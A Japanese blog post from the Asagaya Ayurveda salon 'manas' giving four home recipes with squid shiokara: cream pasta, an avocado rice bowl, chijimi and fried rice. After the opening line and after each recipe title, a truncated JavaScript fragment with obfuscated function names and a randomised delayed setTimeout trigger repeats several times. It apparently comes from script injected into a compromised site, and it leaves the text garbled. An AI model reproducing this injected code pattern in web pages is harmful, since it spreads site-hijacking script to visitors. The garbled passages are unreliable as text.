塩辛クッキング!

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
みなさん、イカの塩辛って好きですか?(唐突)andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
私は自分で作ったこともあるぐらい好きです。
ただ、好きすぎるゆえなのか、ごく少量で
ご飯がたくさん食べられてしまうため
一人暮らしだと、なかなか減らなかったり
そのくせして、生ものなので意外にも
賞味期限が速いので、ちょっと悩ましい面もあり、
なので、なかなかパッと買うことはなかったんですね。
ところが先日、賞味期限の近づいた美味しそうな塩辛が
とてもお安く売っていたので、ついつい購入
今まで、そのままでしか食べなかった塩辛を
うまくアレンジすべく、様々なレシピを検索して
いろいろと作っております
A.塩辛とキャベツのクリームパスタandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
 ☆塩辛をアンチョビ的に使ってみる
110613_1235~01s
1.パスタをゆで始める(時間は、表記より1分短く)
2.にんにく一かけをオリーブオイルで炒めて香り出し
3.塩辛大さじ1~2を入れて軽く炒める
4.きのことか入れるときは一緒に炒める
  (写真はまいたけ入り)
5.生クリーム(牛乳でも可)を100ccくらいと、こしょう、
  鶏がらスープの素(コンソメスープでも可)ちょこっと入れる
  (塩辛の塩加減によるので味見しながら入れすぎないように)
5.パスタのゆで上がり2分前に、ざく切りキャベツを入れて
  いっしょにゆでる
6.ゆで上がったら、お湯を切ってソースに投入
7.からませて出来あがり
※生クリームを使わずに
 にんにくを多め+唐辛子を入れて、ペペロンチーニでも○

B.アボカド塩辛丼andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
110613_2014~03s
1.フライパンに柚子胡椒を少量(小さじ半分~1程度)と
  塩辛大さじ1~2を入れて、火にかけ軽く炒める
2.アボカド半分を皮つきのまま、縦横に包丁を入れてから
  スプーンを皮と身の間に入れて取り出し、1に加える
3.海苔をのせたご飯にのっけて出来上がり
※柚子胡椒は多めの方がピリッとして美味しいんだけど
 しょっぱくもなってしまうので、別の具材をプラスした方が◎
 写真は、炒めた後に納豆も混ぜたもの。(一緒に炒めると臭いが出る)
 他には、きのことか、淡白なものがいいかと。

C.塩辛チヂミandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
 ☆イカがなくても海鮮チヂミになります
 ※大きい2枚分ぐらいの分量
110614_1932~01s
(手前がチヂミ、奥は大根もちw)
1.小麦粉と片栗粉を3:2の割合で、カップ2分の1ぐらい、
  同じくカップ2分の1のお水でとく
2.万能ねぎかにらを3センチ幅に、玉ねぎ(半分)は薄切りにして
  生地に混ぜる
3.塩辛も入れる(大さじ2~3ぐらい、けっこう入れても大丈夫)
4.生地と具の割合が、生地少なめになるように
  具が多ければ粉か卵を足したりする。
5.フライパンにごま油を多めにひいて
  生地を入れて薄くのばし、パリッと焼いていく
6.ある程度焼けたら裏返し、押しつけながら薄く焼いていく
7.タレは、しょうゆ・お酢・みりんを1:1:0.5で混ぜて
  白ゴマを入れる(コチュジャンをちょっといれてもいい)
8.両面が香ばしく焼けたら出来上がり
D.塩辛チャーハンandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
110617_1955~01s
1.具は残ってるもので・・・
  たまねぎ、青ネギ、万能ネギなどネギ類はぜひ。
  あと、人参、ピーマン、ちくわなど。
  写真のは、色合いは悪いけど(笑)たまねぎとみょうがです!
  全部、細かめに切っておく
2.卵は絶対いれたいので、溶いておく
3.フライパンに油をひいて、火の通りにくいものから入れて
  炒めていく
4.具に火が通ったら、フライパンの脇に寄せて
  空いた所に塩辛を大さじ1~2入れて軽く炒める
5.塩辛と具を混ぜて、そこへあったかいご飯投入
6.といた卵を、ご飯にまんべんなくかけるように入れる
7.ご飯と卵液を混ぜるように炒める
8.味を見ながら、鶏がらスープの素、塩コショウで調整
9.万能ねぎなど火を通さなくていいものは、
  最後に入れて軽く混ぜて、出来上がり
アーユルヴェーダサロンmanas 《マナス》

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です